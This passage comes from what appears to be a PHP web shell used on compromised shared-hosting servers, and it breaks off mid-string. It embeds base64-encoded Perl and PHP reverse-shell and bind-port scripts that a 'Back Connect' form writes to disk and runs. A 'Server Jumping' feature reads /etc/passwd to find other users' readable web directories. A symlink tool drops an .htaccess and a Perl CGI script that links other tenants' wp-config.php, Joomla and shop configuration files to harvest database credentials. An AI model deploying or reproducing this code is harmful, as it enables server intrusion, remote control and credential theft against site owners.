bl9hcnJheSgkcGlwZXNbMl0sICRyZWFkX2EpKSB7IGlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUiBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERFUlI6ICRpbnB1dCIpOyBmd3JpdGUoJHNvY2ssICRpbnB1dCk7IH0NCn0NCmZjbG9zZSgkc29jayk7DQpmY2xvc2UoJHBpcGVzWzBdKTsNCmZjbG9zZSgkcGlwZXNbMV0pOw0KZmNsb3NlKCRwaXBlc1syXSk7DQpwcm9jX2Nsb3NlKCRwcm9jZXNzKTsNCmZ1bmN0aW9uIHByaW50aXQgKCRzdHJpbmcpIHsgaWYgKCEkZGFlbW9uKSB7IHByaW50ICIkc3RyaW5nXG4iOyB9IH0NCj8+"
                );

                $bp = array(
                "pl" => "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="
                );

            } elseif($win && !$posix){

                $bc = array(
                "pl" => "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgiZWNoby4gJiYgZWNobyA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gJiYgZWNoby4gJiYgY21kIik7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0KY2xvc2UoU1RERVJSKTs=",
                "php" => "PD9waHANCnNldF90aW1lX2xpbWl0ICgwKTsNCi8vaWYoUEhQX1NBUEkgIT0gImNsaSIpIGRpZSgiTm90IEdVSSIpOyANCmlmKCRhcmd2IDwgMSkgZGllKCJJbnZhbGlkIik7DQokaXAgPSAkYXJndlsxXTsgJHBvcnQgPSAkYXJndlsyXTsgJGNodW5rX3NpemUgPSAxNDAwOyAkd3JpdGVfYSA9IG51bGw7ICRlcnJvcl9hID0gbnVsbDsgJHNoZWxsID0gImNtZCI7ICRkYWVtb24gPSAwOyAkZGVidWcgPSAwOw0KaWYgKGZ1bmN0aW9uX2V4aXN0cygncGNudGxfZm9yaycpKSB7DQokcGlkID0gcGNudGxfZm9yaygpOw0KaWYgKCRwaWQgPT0gLTEpIHsgcHJpbnRpdCgiRVJST1I6IENhbid0IGZvcmsiKTsgZXhpdCgxKTsgfQ0KaWYgKCRwaWQpIHsgZXhpdCgwKTsgfQ0KaWYgKHBvc2l4X3NldHNpZCgpID09IC0xKSB7IHByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOyBleGl0KDEpOyB9DQokZGFlbW9uID0gMTsNCn0gZWxzZSB7IHByaW50aXQoIldBUk5JTkc6IEZhaWxlZCB0byBkYWVtb25pc2UuICBUaGlzIGlzIHF1aXRlIGNvbW1vbiBhbmQgbm90IGZhdGFsLiIpOyB9DQovL2NoZGlyKCIvIik7DQp1bWFzaygwKTsNCiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOw0KaWYgKCEkc29jaykgeyBwcmludGl0KCIkZXJyc3RyICgkZXJybm8pIik7IGV4aXQoMSk7IH0NCiRkZXNjcmlwdG9yc3BlYyA9IGFycmF5KDAgPT4gYXJyYXkoInBpcGUiLCAiciIpLDEgPT4gYXJyYXkoInBpcGUiLCAidyIpLDIgPT4gYXJyYXkoInBpcGUiLCAidyIpKTsNCiRwcm9jZXNzID0gcHJvY19vcGVuKCRzaGVsbCwgJGRlc2NyaXB0b3JzcGVjLCAkcGlwZXMpOw0KaWYgKCFpc19yZXNvdXJjZSgkcHJvY2VzcykpIHsgcHJpbnRpdCgiRVJST1I6IENhbid0IHNwYXduIHNoZWxsIik7IGV4aXQoMSk7IH0NCnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzBdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzJdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssIDApOw0KcHJpbnRpdCgiU3VjY2Vzc2Z1bGx5IG9wZW5lZCByZXZlcnNlIHNoZWxsIHRvICRpcDokcG9ydCIpOw0Kd2hpbGUgKDEpIHsgaWYgKGZlb2YoJHNvY2spKSB7IHByaW50aXQoIkVSUk9SOiBTaGVsbCBjb25uZWN0aW9uIHRlcm1pbmF0ZWQiKTsgYnJlYWs7IH0NCmlmIChmZW9mKCRwaXBlc1sxXSkpIHsgcHJpbnRpdCgiRVJST1I6IFNoZWxsIHByb2Nlc3MgdGVybWluYXRlZCIpOyBicmVhazsgfQ0KJHJlYWRfYSA9IGFycmF5KCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7DQokbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9zZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsNCmlmIChpbl9hcnJheSgkc29jaywgJHJlYWRfYSkpIHsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSyBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRzb2NrLCAkY2h1bmtfc2l6ZSk7IGlmICgkZGVidWcpIHByaW50aXQoIlNPQ0s6ICRpbnB1dCIpOyBmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOyB9DQppZiAoaW5fYXJyYXkoJHBpcGVzWzFdLCAkcmVhZF9hKSkgeyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQgUkVBRCIpOyAkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RET1VUOiAkaW5wdXQiKTsgZndyaXRlKCRzb2NrLCAkaW5wdXQpOyB9DQppZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkgeyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERFUlIgUkVBRCIpOyAkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMl0sICRjaHVua19zaXplKTsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RERVJSOiAkaW5wdXQiKTsgZndyaXRlKCRzb2NrLCAkaW5wdXQpOyB9DQp9DQpmY2xvc2UoJHNvY2spOw0KZmNsb3NlKCRwaXBlc1swXSk7DQpmY2xvc2UoJHBpcGVzWzFdKTsNCmZjbG9zZSgkcGlwZXNbMl0pOw0KcHJvY19jbG9zZSgkcHJvY2Vzcyk7DQpmdW5jdGlvbiBwcmludGl0ICgkc3RyaW5nKSB7IGlmICghJGRhZW1vbikgeyBwcmludCAiJHN0cmluZ1xuIjsgfSB9DQo/Pg=="
                );

                $bp = array(
                "pl" => "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9ImNtZCI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCnVzZSBTb2NrZXQ7DQpzb2NrZXQoUywmUEZfSU5FVCwmU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSB8fCBkaWUgIkNhbnQgY3JlYXRlIHNvY2tldFxuIjsNCnNldHNvY2tvcHQoUyxTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKTsNCmJpbmQoUyxzb2NrYWRkcl9pbigkQVJHVlswXSxJTkFERFJfQU5ZKSkgfHwgZGllICJDYW50IG9wZW4gcG9ydFxuIjsNCmxpc3RlbihTLDMpIHx8IGRpZSAiQ2FudCBsaXN0ZW4gcG9ydFxuIjsNCndoaWxlKDEpIHsNCglhY2NlcHQoQ09OTixTKTsNCglpZighKCRwaWQ9Zm9yaykpIHsNCgkJZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0KCQlvcGVuIFNURElOLCI8JkNPTk4iOw0KCQlvcGVuIFNURE9VVCwiPiZDT05OIjsNCgkJb3BlbiBTVERFUlIsIj4mQ09OTiI7DQoJCWV4ZWMgJFNIRUxMIHx8IGRpZSBwcmludCBDT05OICJDYW50IGV4ZWN1dGUgJFNIRUxMXG4iOw0KCQljbG9zZSBDT05OOw0KCQlleGl0IDA7DQoJfQ0KfQ=="
                );

            }

            echo "<form action=\"?cwd=$cwd&amp;action=tools\" method=\"post\">\n".

                 "  <h1 class=\"cantik\">Shell Tools</h1>\n".

                 "  <fieldset style=\"width: 40%;\">\n".
                 "      <legend>Network tools</legend>\n".

                 "      Back Connect: <br />\n".
                 "      <input type=\"text\" name=\"BC_ip\" value=\"".((getenv('REMOTE_ADDR')) ? ($_SERVER['REMOTE_ADDR']) : ("127.0.0.1"))."\" placeholder=\"IP Address\" class=\"kotak\">\n".
                 "      <input type=\"text\" name=\"BC_port\" value=\"31337\" placeholder=\"Port\" class=\"kotak\">\n".
                 "      <select class=\"kotak\" name=\"BC_mode\"> <option value=\"perl\">Perl</option> <option value=\"php\">PHP</option> </select>\n".
                 "      <input type=\"submit\" name=\"SubmitBC\" value=\"connect\" class=\"kotak\"> <br />\n".

                 "      <br />\n".

                 "      Bind Port to <b>/bin/sh</b>: <br />\n".
                 "      <input type=\"text\" name=\"BP_port\" value=\"31337\" placeholder=\"Port\" class=\"kotak\">\n".
                 "      <select class=\"kotak\" name=\"BP_mode\"> <option value=\"perl\">Perl</option> </select>\n".
                 "      <input type=\"submit\" name=\"SubmitBP\" value=\"bind port\" class=\"kotak\"> <br /><br />\n";

            if(isset($_POST['SubmitBC'])){
                echo "<hr />";
                if(empty($_POST['BC_ip'])) $_POST['BC_ip'] = $_SERVER['REMOTE_ADDR'];
                if(empty($_POST['BC_port'])) $msg = "Port is empty !!";

                elseif($_POST['BC_mode'] == "perl"){
                    b64wrt($cwd.".PHHM_files/bc/bc.pl", $bc['pl']);
                    if(!$win && $posix){ perintah("chmod +x ".$cwd.".PHHM_files/bc/bc.pl"); }
                    perintah("perl ".$cwd.".PHHM_files/bc/bc.pl ".trim($_POST['BC_ip'])." ".trim($_POST['BC_port']));
                    $msg = "[BACK CONNECT][PERL] Trying to connect @ ".trim($_POST['BC_ip']).":".trim($_POST['BC_port'])."";
                }

                elseif($_POST['BC_mode'] == "php"){
                    b64wrt($cwd.".PHHM_files/bc/bc.php", $bc['php']);
                    if(!$win && $posix){ perintah("chmod +x ".$cwd.".PHHM_files/bc/bc.pl"); }
                    perintah("php ".$cwd.".PHHM_files/bc/bc.php ".trim($_POST['BC_ip'])." ".trim($_POST['BC_port']));
                    $msg = "[BACK CONNECT][PHP] Trying to connect @ ".trim($_POST['BC_ip']).":".trim($_POST['BC_port'])."";
                }

                echo $msg;
            } elseif(isset($_POST['SubmitBP'])){
                if(empty($_POST['BP_port'])) $msg = "Port is empty !!";
                elseif($_POST['BP_mode'] == "perl"){
                    b64wrt("bp.pl", $bp['pl']);
                    if(!$win && $posix){ perintah("chmod +x bp.pl"); }
                    perintah("perl bp.pl ".trim($_POST['BP_port'])."");
                    $msg = "[PORT BIND][PERL] Trying to bind port <b>(".trim($_POST['BP_port']).")</b> @ ".$_SERVER['SERVER_ADDR']."";
                }
                echo $msg;
            }

            echo "  </fieldset>\n".

                 "  <br />\n".

                 "  <fieldset style=\"width: 40%;\">\n".
                 "      <legend>File/Directory NOT Writable? Permission Denied when saving file? Try this &minus; File permission checker</legend>\n".
                 "      <input type=\"text\" name=\"dir2chk\" value=\"$cwd\" class=\"kotak\" size=\"40%\" />\n".
                 "      <input type=\"submit\" name=\"SubmitCHK\" value=\"Scan...!!!\" class=\"kotak\" /><br />\n";

            if(isset($_POST['SubmitCHK'])){
                if($_POST['dir2chk'] == ""){ $_POST['dir2chk'] = $cwd; }
                echo "<hr />Scanning folder <b>".magicboom($_POST['dir2chk'])."</b> ....<br /><br />";
                $dcount = 0; $fcount = 0; $msg = "";

                if($a = opendir(magicboom($_POST['dir2chk']))){
                    while($b = readdir($a)){
                        if(is_dir($b)){
                            if(is_writable($b)){
                                $msg .= "DIR ".$b." is writable !<br />\n";
                                $dcount++;
                            }
                        }
                        elseif(is_file($b)){
                            if(is_writable($b)){
                                $msg .= "FILE ".$b." is writable !<br />\n";
                                $fcount++;
                            }
                        }
                    }
                    closedir($a);
                    echo $msg;
                    echo "<hr />";
                    if($fcount < 2){ echo $fcount." Writable file found !<br />\n"; } else { echo $fcount." Writable files found !<br />\n"; }
                    if($dcount < 2){ echo $fcount." Writable directory found !<br />\n"; } else { echo $dcount." Writable directories found !<br />\n"; }
                }
            }

            echo "</fieldset>".

                 "</form>";

            true;
        }

        elseif(isset($_GET['action']) && $_GET['action'] == "jumping"){
            echo "\n\n<form action=\"?cwd=".$cwd."&amp;action=jumping\" method=\"post\">\n";
            echo "<h1 class=\"cantik\">Server Jumping</h1>";
            $exp = explode(DIRECTORY_SEPARATOR, $cwd);
            if($exp[3] != "public_html" || $win){
                echo "Can't jump on this server - Path is not <b>the-regular-/home/user/public_html</b> or you are running on a <b>Windows</b> server. <br />";
                echo "Thank you for using this shell :)";
                exit;
            } elseif($safemode) {
                echo "Safe Mode is enabled... Bypass it first";
                exit;
            } elseif($exp[3] == "public_html" && $posix && !$win) {
                $pub = array();
                foreach(file("/etc/passwd") as $row){
                    $kaun = 0;
                    $pecah = explode(":", $row);
                    for($c=0; $c<count($pecah[0])+1; $c++){
                        if(is_readable("/home/".$pecah[$c]."/public_html/")){
                            array_push($pub, "/home/".$pecah[$c]."/public_html/");
                            echo "[+] Readable &minus; <a href=\"?cwd=/home/".$pecah[$c]."/public_html/\" title=\"/home/".$pecah[$c]."/public_html/\" target=\"_blank\">/home/".$pecah[$c]."/public_html/</a><br />\n";
                        }
                    }
                }
                echo "Found ".sizeof($pub)." readable DIR";
            }
            echo "</form>";
        }

        elseif(isset($_GET['action']) && $_GET['action'] == "sym_menu"){
            if(is_writable($cwd)){
                if(!is_dir($cwd.".PHHM_files")){ mkdir($cwd.".PHHM_files", 0777); }
                if(!is_dir($cwd.".PHHM_files/sym")){ mkdir($cwd.".PHHM_files/sym", 0777); }
                if(!is_dir($cwd.".PHHM_files/sym/perl")){ mkdir($cwd.".PHHM_files/sym/perl", 0777); }
                if(!is_dir($cwd.".PHHM_files/sym/php")){ mkdir($cwd.".PHHM_files/sym/php", 0777); }
                if(!is_dir($cwd.".PHHM_files/bc")){ mkdir($cwd.".PHHM_files/bc", 0777); }
            }
            echo "<form action=\"?cwd=".$cwd."&amp;action=sym_menu\" method=\"post\">\n".
                 "<h1 class=\"cantik\">Symlink Menu</h1>\n".
                 "&minus; Symlink configuration files using....: <br />\n".
                 "[ <a href=\"?cwd=".$cwd."&amp;action=sym_auto_perl\" title=\"Symlink configuration files using PERL script\">PERL</a> ]\n".
                 "[ <a href=\"?cwd=".$cwd."&amp;action=sym_auto_php\" title=\"Symlink configuration files using PHP script\">PHP</a> ]\n".
                 "</form>";
        }

        elseif(isset($_GET['action']) && $_GET['action'] == "sym_auto_perl"){
            if(!is_file($cwd.".PHHM_files/sym/perl/.htaccess")){
                b64wrt($cwd.".PHHM_files/sym/perl/.htaccess", "T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuaGF4DQpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLmhheA0KQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5oYXg=");
            }
            if(!is_file($cwd.".PHHM_files/sym/perl/config.hax")){
                b64wrt($cwd.".PHHM_files/sym/perl/config.hax", "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5Db25maWcgUFdOPC90aXRsZT4NCjxsaW5rIGhyZWY9Imh0dHA6Ly9pY29ucy5pY29uc2Vla2VyLmNvbS9wbmcvZnVsbHNpemUvaGFsbG93ZWVuL3NrdWxsLnBuZyIgcmVsPSJpY29uIiB0eXBlPSJpbWFnZS94LXBuZyIgLz4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCglvdmVyZmxvdy14OiBoaWRkZW47DQoJb3ZlcmZsb3cteTogaGlkZGVuOw0KfQ0KLmR6IHsNCiAgICBmb250LWZhbWlseTogVGFob21hOw0KICAgIGZvbnQtc2l6ZTogMTRweDsNCiAgICBmb250LXdlaWdodDogYm9sZDsNCiAgICBjb2xvcjogIzMzMzNGRjsNCiAgICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogICAgdGV4dC1zaGFkb3c6IGJsYWNrIDBweCAwcHggMnB4Ow0KfQ0KI2NoZWNrb3V0dGV4dGFyZWEgeyB3ZWJraXQtYm9yZGVyLXJhZGl1czogMTVweDsgfQ0KaG92ZXIjY2hlY2tvdXR0ZXh0YXJlYSB7IG9wYWNpdHk6IDAuNjsgYmFja2dyb3VuZC1jb2xvcjozMzMzMzMgfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCic7DQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiRtc3IgPSBxeHtwd2R9Ow0KJGhhaGFnYXk9JG1zci4iLyIuJHVzZXI7DQokaGFoYWdheT1+cy9cbi8vZzsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGhhaGFnYXkuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRoYWhhZ2F5Lictc2hvcC1vcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkaGFoYWdheS4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGhhaGFnYXkuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRoYWhhZ2F5Lictb3Njb21tZXJjZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcC9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkaGFoYWdheS4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRoYWhhZ2F5Lictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRoYWhhZ2F5Lictc2FsZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywkaGFoYWdheS4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRoYWhhZ2F5LictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRoYWhhZ2F5LictMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkaGFoYWdheS4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkaGFoYWdheS4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGhhaGFnYXkuJy01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRoYWhhZ2F5LictNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwMTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cDEzLXdwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dQL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AxMy1XUC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AxMy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cDEzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJlc3Mvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwMTMtd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwMTMtV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AxMy13b3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AxMy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwMTMtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC1ibG9nLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AtYmxvZ3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywkaGFoYWdheS4nLXdwLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRoYWhhZ2F5Lictd3AtcHJvdGFsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC1tYWluLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Rlc3Qvd3AtY29uZmlnLnBocCcsJGhhaGFnYXkuJy13cC10ZXN0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGhhaGFnYXkuJy02LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZGIucGhwJywkaGFoYWdheS4nLTcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29ubmVjdC5waHAnLCRoYWhhZ2F5LictOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGhhaGFnYXkuJy05LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsJGhhaGFnYXkuJy0xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vbWxhMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb28vY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1qb29tbGEtY21zLnR4d